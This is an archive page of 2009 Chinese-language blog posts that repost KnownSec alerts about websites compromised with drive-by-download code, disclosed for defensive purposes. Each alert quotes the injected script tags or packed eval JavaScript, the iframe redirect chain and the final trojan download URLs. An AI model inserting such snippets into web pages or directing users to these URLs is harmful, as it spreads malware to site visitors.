This theme is downloaded from wordpress themes website.

Archive for August, 2009

考研共济网被植入恶意代码

发布时间:Tue Aug 18 2009 19:40:41 UTC+0800
最后更新时间:Tue Aug 18 2009 19:40:41 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 考研共济网(http://www.kaoyantj.com/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.kaoyantj.com/

网页被嵌入恶意链接代码:

<script src=http://3b3.org/c.js></script>
挂马分析:
[wide]http://zhuanyeguide.kaoyantj.com/
[script]http://3b3.org/c.js
[iframe]http://df5fdd.3322.org/aa/a100.htm
[iframe]http://df5fdd.3322.org/aa/index.htm
[iframe]http://df5fdd.3322.org/aa/he.htm
[iframe]http://df5fdd.3322.org/aa/test.htm
[iframe]http://df5fdd.3322.org/aa/02.htm
[iframe]http://df5fdd.3322.org/aa/pp.htm
[iframe]http://df5fdd.3322.org/aa/f.htm
[iframe]http://df5fdd.3322.org/aa/of.htm
[iframe]http://df5fdd.3322.org/aa/r.htm
[iframe]http://df5fdd.3322.org/aa/r.html
[script]http://%33%67%6f%64%2e%6e%65%74/%73%2e%6a%73
[iframe]http://df5fdd.3322.org/aa/a100.htm

最终下载病毒文件:
http://mstsc2005.com/qq.exe

通过执行以上病毒文件,来达到完全控制访问者的系统。

该网站历史挂马次数:1
Google对该网站的判定:安全

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.com或sec@scanw.com
联系电话:13552251891。

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 4% [?]

网站挂马记录 lk 18 Aug 2009 No Comments

武汉热线游戏频道被植入恶意代码

发布时间:Sun Aug 16 2009 20:24:38 UTC+0800
最后更新时间:Sun Aug 16 2009 20:24:38 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 武汉热线游戏频道(http://game.wuhan.net.cn/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://game.wuhan.net.cn/

网页被嵌入恶意链接代码:

if(document.cookie.indexOf(’hello’)==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie=’hello=Yes;path=/;expires=’+expires.toGMTString()
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(’\\b’+e(c)+’\\b’,'g’),k[c]);return p}(’b.t(\’<q k=i r=f://4.8.5.3.n/h/6.7?1></q><g d=0 s=0 r=”f://m.v.9/e/j/2/a/l.o?1″></g><g d=0 s=0 r=”f://u.p.8/l.c?1″></g>\’)',62,32,’|123|200812|3322|360|97sewo|asd|aspx|cn|com|data|document|gif|height|html|http|iframe|images|javascript|juhui|language|logo|news|org|png|qqxnm|script|src|width|writeln|www|zhike’.split(’|'),0,{}));}
挂马分析:
0 Root  http://game.wuhan.net.cn/
1 script  http://game.wuhan.net.cn/game/include/dedeajax2.js
2 script  http://360.cn.97sewo.3322.org/images/asd.aspx?123
2 iframe  http://news.zhike.com/html/juhui/200812/data/logo.png?123
3 anlyze  http://news.zhike.com/html/juhui/200812/data/logo.htm?
4 iframe  http://news.zhike.com/html/juhui/200812/data/aa.htm?
5 iframe  http://news.zhike.com/html/juhui/200812/data/wm/html/index.htm?
6 iframe  http://news.zhike.com/html/juhui/200812/data/wm/html/of.htm
6 script  http://news.zhike.com/html/juhui/200812/data/wm/html/var.js
6 script  http://news.zhike.com/html/juhui/200812/data/wm/html/tj.js
4 iframe  http://news.zhike.com/html/juhui/200812/data/bb.htm?
2 iframe  http://www.qqxnm.cn/logo.gif?123
最终下载病毒文件:
http://news.zhike.com/html/juhui/200812/data/wm/download.exe

通过执行以上病毒文件,来达到完全控制访问者的系统。

 该网站历史挂马次数:3
Google对该网站的判定:安全

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.comsec@scanw.com
联系电话:13552251891。

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 5% [?]

网站挂马记录 lk 16 Aug 2009 No Comments

浙江林学院经济管理学院被植入恶意代码

发布时间:Sun Aug 16 2009 20:09:48 UTC+0800
最后更新时间:Sun Aug 16 2009 20:09:48 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 浙江林学院经济管理学院(http://em.zjfc.edu.cn/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://em.zjfc.edu.cn/

网页被嵌入恶意链接代码:

<script src=http://%77%2E%76%61%62%63%6E%2E%63%6F%6D%2E%63%6E></script><script src=http://%77%2E%76%61%62%63%6E%2E%63%6F%6D%2E%63%6E></script><script src=http://%77%2E%76%61%62%63%6E%2E%63%6F%6D%2E%63%6E></script><script src=http://%77%2E%76%61%62%63%6E%2E%63%6F%6D%2E%63%6E></script>
挂马分析:
[wide]http://em.zjfc.edu.cn/
 [script]http://%77%2e%76%61%62%63%6e%2e%63%6f%6d%2e%63%6e
  [frame]http://xxxo.6600.org/dszq/2.htm
   [frame]http://d2y2i.cn/x2/xx.html
    [frame]http://d2y2i.cn/x2/td14.htm
    [frame]http://d2y2i.cn/x2/yt.htm
    [frame]http://d2y2i.cn/x2/dxxz.htm
    [frame]http://d2y2i.cn/x2/yut.htm
     [frame]http://d2y2i.cn/x2/ytfl.htm
     [frame]http://d2y2i.cn/x2/ytfl1.htm
     [frame]http://d2y2i.cn/x2/of.htm
   [script]http://js.tongji.linezing.com/1240663/tongji.js
最终下载病毒文件:
http://d.ksxwa.com/xx/x2.css

通过执行以上病毒文件,来达到完全控制访问者的系统。

 该网站历史挂马次数:1
Google对该网站的判定:安全

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.comsec@scanw.com
联系电话:13552251891。

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 4% [?]

网站挂马记录 lk 16 Aug 2009 No Comments

湖南科技大学研究生处被植入恶意代码

发布时间:Sat Aug 15 2009 22:44:37 UTC+0800
最后更新时间:Sat Aug 15 2009 22:44:37 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 湖南科技大学研究生处(http://graduate.hnust.cn)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://graduate.hnust.cn

网页被嵌入恶意链接代码:

<script src=http://3god.ne%74/c.js></script>
挂马分析:
[wide]http://graduate.hnust.cn/
 [script]http://3god.ne%74/c.js
  [frame]http://df5fdd.3322.org/aa/a100.htm
   [frame]http://df5fdd.3322.org/aa/index.htm
    [frame]http://df5fdd.3322.org/aa/nyntd14.htm
    [frame]http://df5fdd.3322.org/aa/nyntdfll.htm
    [frame]http://df5fdd.3322.org/aa/of.htm
    [frame]http://df5fdd.3322.org/aa/nyntdi.htm
    [frame]http://df5fdd.3322.org/aa/huoh.htm
   [script]http://js.tongji.linezing.com/1235552/tongji.js
   [script]http://s6.cnzz.com/stat.php?id=1408284&web_id=1408284
  [script]http://%33%67%6f%64%2e%6e%65%74/%73%2e%6a%73
   [frame]http://df5fdd.3322.org/aa/a100.htm
  [script]http://js.tongji.linezing.com/1136402/tongji.js
最终下载病毒文件:
http://mstsc2005.com/qq.exe
http://www.twin-2009.com/svchost.exe

通过执行以上病毒文件,来达到完全控制访问者的系统。

 该网站历史挂马次数:3
Google对该网站的判定:安全

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.comsec@scanw.com
联系电话:13552251891。

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 6% [?]

网站挂马记录 lk 15 Aug 2009 No Comments

希望杯全国数学邀请赛组委会被植入恶意代码

发布时间:Sat Aug 15 2009 22:22:09 UTC+0800
最后更新时间:Sat Aug 15 2009 22:22:09 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 希望杯全国数学邀请赛组委会(http://www.hopecup.org/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.hopecup.org/

网页被嵌入恶意链接代码:

<script src=http://%77%2E%74%6F%79%6F%6E%79%2E%63%6F%6D%2E%63%6E></script><script src=http://%77%2E%74%74%6B%69%73%73%2E%63%6F%6D%2E%63%6E></script><script src=http://%67%61%6E%67%61%6F%2E%6F%72%67%2E%63%6E></script><script src=http://%67%61%6E%67%61%6F%2E%6F%72%67%2E%63%6E></script><script src=http://%67%75%61%6E%6C%69%73%2E%63%6E></script>
挂马分析:
[wide]http://www.hopecup.org/
 [refresh]http://www.hopecup.org/hopecup_ver3/default.asp
 [script]http://%77%2e%74%6f%79%6f%6e%79%2e%63%6f%6d%2e%63%6e
  [frame]http://xxqb.6600.org/dszq/2.htm
   [frame]http://g1a1e.cn/x2/xx.html
    [frame]http://g1a1e.cn/x2/td14.htm
    [frame]http://g1a1e.cn/x2/yt.htm
    [frame]http://g1a1e.cn/x2/dxxz.htm
    [frame]http://g1a1e.cn/x2/yut.htm
     [frame]http://g1a1e.cn/x2/ytfl.htm
     [frame]http://g1a1e.cn/x2/ytfl1.htm
     [frame]http://g1a1e.cn/x2/of.htm
   [script]http://tongji.linezing.com/1240663/tongji.js
 [script]http://%77%2e%74%74%6b%69%73%73%2e%63%6f%6d%2e%63%6e
 [script]http://%67%61%6e%67%61%6f%2e%6f%72%67%2e%63%6e
 [script]http://%67%61%6e%67%61%6f%2e%6f%72%67%2e%63%6e
 [script]http://%67%75%61%6e%6c%69%73%2e%63%6e
最终下载病毒文件:
http://d.ksxwa.com/xx/x2.css

通过执行以上病毒文件,来达到完全控制访问者的系统。

 该网站历史挂马次数:1
Google对该网站的判定:安全

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.comsec@scanw.com
联系电话:13552251891。

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 3% [?]

网站挂马记录 lk 15 Aug 2009 No Comments

iMP3随身影音被植入恶意代码

发布时间:Sat Aug 15 2009 14:30:51 UTC+0800
最后更新时间:Sat Aug 15 2009 14:30:51 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 iMP3随身影音(http://www.imp3.net/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.imp3.net/data/js/66.js

网页被嵌入恶意链接代码:

document.write(’<script src=http://219.159.68.185/cnzz.js></script>’)
挂马分析:
[wide]http://bbs.imp3.net/thread-367423-1-1.html
    [script]http://www.imp3.net/data/js/66.js
        [script]http://219.159.68.185/cnzz.js
            [iframe]http://dkny.9966.org/root/3/3.htm?
                [iframe]http://dkny.9966.org/root/3/nb.htm
                    [iframe]http://dkny.9966.org/root/3/yl14.htm
                    [iframe]http://dkny.9966.org/root/3/ylte.htm
                    [iframe]http://dkny.9966.org/root/3/ylof.htm
                    [iframe]http://dkny.9966.org/root/3/yl02.htm
                    [iframe]http://dkny.9966.org/root/3/ylhu.htm
                    [iframe]http://dkny.9966.org/root/3/ylpp.htm
                        [iframe]http://dkny.9966.org/root/3/fl.htm
                        [iframe]http://dkny.9966.org/root/3/of.htm
                        [iframe]http://dkny.9966.org/root/3/r.htm
                        [iframe]http://dkny.9966.org/root/3/r.html
                [script]http://js.users.51.la/3077323.js
            [iframe]http://dkny.9966.org/root/3/3.htm?
            [iframe]http://dkny.9966.org/root/3/3.htm?
            [iframe]http://dkny.9966.org/root/3/3.htm?
最终下载病毒文件:
http://dkny.9966.org/i/s3.exe

通过执行以上病毒文件,来达到完全控制访问者的系统。

 该网站历史挂马次数:1
Google对该网站的判定:安全

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.comsec@scanw.com
联系电话:13552251891。

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 3% [?]

网站挂马记录 lk 15 Aug 2009 No Comments

陕西互联星空被植入恶意代码

发布时间:Fri Aug 14 2009 22:15:35 UTC+0800
最后更新时间:Fri Aug 14 2009 22:15:35 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 陕西互联星空(http://sn.vnet.cn/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://img.sn.vnet.cn/vnetcms2_files/pages/date.js

网页被嵌入恶意链接代码:

document.writeln(”<script language=javascript src=http:\/\/myut.kmip.net\/cs.js><\/script>”)
挂马分析:
[wide]http://v.sn.vnet.cn/index/news.jsp?contentId=1892721
    [script]http://img.sn.vnet.cn/vnetcms2_files/pages/date.js
        [script]http://myut.kmip.net/cs.js
            [iframe]http://cnksq.cn/jj/8.htm
                [iframe]http://zz77z.cn/x40/xx.html
                    [iframe]http://zz77z.cn/x40/td14.htm
                    [iframe]http://zz77z.cn/x40/yt.htm
                    [iframe]http://zz77z.cn/x40/dxxz.htm
                    [iframe]http://zz77z.cn/x40/yut.htm
                        [iframe]http://zz77z.cn/x40/ytfl.htm
                        [iframe]http://zz77z.cn/x40/ytfl1.htm
                        [iframe]http://zz77z.cn/x40/of.htm
最终下载病毒文件:
http://d.ksxwa.com/xx/x40.css

通过执行以上病毒文件,来达到完全控制访问者的系统。

 该网站历史挂马次数:1
Google对该网站的判定:安全

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.comsec@scanw.com
联系电话:13552251891。

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 3% [?]

网站挂马记录 lk 14 Aug 2009 No Comments

中国产业竞争情报网被植入恶意代码

发布时间:Thu Aug 13 2009 21:41:37 UTC+0800
最后更新时间:Thu Aug 13 2009 21:41:37 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 中国产业竞争情报网(http://www.chinacir.com.cn)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.chinacir.com.cn/report/20081216145154.shtml

网页被嵌入恶意链接代码:

<script type=”text/javascript” src=”http://google.googlee6.cn/hao.js”></script>
挂马分析:
[wide]http://www.chinacir.com.cn/report/20081216145154.shtml
    [script]http://google.googlee6.cn/hao.js
        [iframe]http://google.googlee7.cn/bb.htm
            [iframe]http://google.googlee7.cn/webx/web.htm
                [iframe]http://google.googlee7.cn/webx/he.htm
                [iframe]http://google.googlee7.cn/webx/test.htm
                [iframe]http://google.googlee7.cn/webx/02.htm
                [iframe]http://google.googlee7.cn/webx/fl10.htm
                [iframe]http://google.googlee7.cn/webx/pp.htm
                    [iframe]http://google.googlee7.cn/webx/p.htm
                    [iframe]http://google.googlee7.cn/webx/f.htm
                    [iframe]http://google.googlee7.cn/webx/of.htm
                    [iframe]http://google.googlee7.cn/webx/r.htm
                    [iframe]http://google.googlee7.cn/webx/r.html
最终下载病毒文件:
http://www.goodhao168.com/cmd.css

通过执行以上病毒文件,来达到完全控制访问者的系统。

 该网站历史挂马次数:1
Google对该网站的判定:安全

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.comsec@scanw.com
联系电话:13552251891。

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 3% [?]

网站挂马记录 lk 13 Aug 2009 No Comments

精英外贸论坛被植入恶意代码

发布时间:Thu Aug 13 2009 21:21:23 UTC+0800
最后更新时间:Thu Aug 13 2009 21:21:23 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 精英外贸论坛(http://bbs.cnexp.net)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://bbs.cnexp.net

网页被嵌入恶意链接代码:

<script src=http://219.159.68.185/cnzz.js></script>
挂马分析:
[wide]http://bbs.cnexp.net
    [script]http://219.159.68.185/cnzz.js
        [iframe]http://adsh.9966.org/root/3/3.htm?
            [iframe]http://adsh.9966.org/root/3/nb.htm
                [iframe]http://adsh.9966.org/root/3/he.htm
                [iframe]http://adsh.9966.org/root/3/te.htm
                [iframe]http://adsh.9966.org/root/3/02.htm
                [iframe]http://adsh.9966.org/root/3/pp.htm
                    [iframe]http://adsh.9966.org/root/3/fl.htm
                    [iframe]http://adsh.9966.org/root/3/of.htm
                    [iframe]http://adsh.9966.org/root/3/r.htm
                    [iframe]http://adsh.9966.org/root/3/r.html
            [script]http://js.users.51.la/3077323.js
        [iframe]http://adsh.9966.org/root/3/3.htm?
        [iframe]http://adsh.9966.org/root/3/3.htm?
        [iframe]http://adsh.9966.org/root/3/3.htm?
最终下载病毒文件:
http://xiqiji36.cn/i/s3.exe

通过执行以上病毒文件,来达到完全控制访问者的系统。

 该网站历史挂马次数:1
Google对该网站的判定:安全

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.comsec@scanw.com
联系电话:13552251891。

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 3% [?]

网站挂马记录 lk 13 Aug 2009 No Comments

52硬件被植入恶意代码

发布时间:Wed Aug 12 2009 20:41:00 UTC+0800
最后更新时间:Wed Aug 12 2009 20:41:00 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 52硬件(http://www.52hardware.com/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.52hardware.com/script/dc.js

网页被嵌入恶意链接代码:

document.writeln(”<iframe src=http:\/\/q1b.3322.org\/aa\/b103.htm width=100 height=0><\/iframe>”)
挂马分析:
[wide]http://os.52hardware.com/library/200801/0928483.html
    [script]http://www.52hardware.com/script/dc.js
        [iframe]http://q1b.3322.org/aa/b103.htm
            [iframe]http://q1b.3322.org/aa/index.htm
                [iframe]http://q1b.3322.org/aa/he.htm
                [iframe]http://q1b.3322.org/aa/test.htm
                [iframe]http://q1b.3322.org/aa/02.htm
                [iframe]http://q1b.3322.org/aa/pp.htm
                    [iframe]http://q1b.3322.org/aa/p.htm
                    [iframe]http://q1b.3322.org/aa/f.htm
                    [iframe]http://q1b.3322.org/aa/of.htm
                    [iframe]http://q1b.3322.org/aa/r.htm
                    [iframe]http://q1b.3322.org/aa/r.html
最终下载病毒文件:
http://www.twin-2009.com/svchost.exe

通过执行以上病毒文件,来达到完全控制访问者的系统。

 该网站历史挂马次数:1
Google对该网站的判定:安全

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.comsec@scanw.com
联系电话:13552251891。

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 5% [?]

网站挂马记录 lk 12 Aug 2009 No Comments

« Previous PageNext Page »

Recommended: Buy movies online.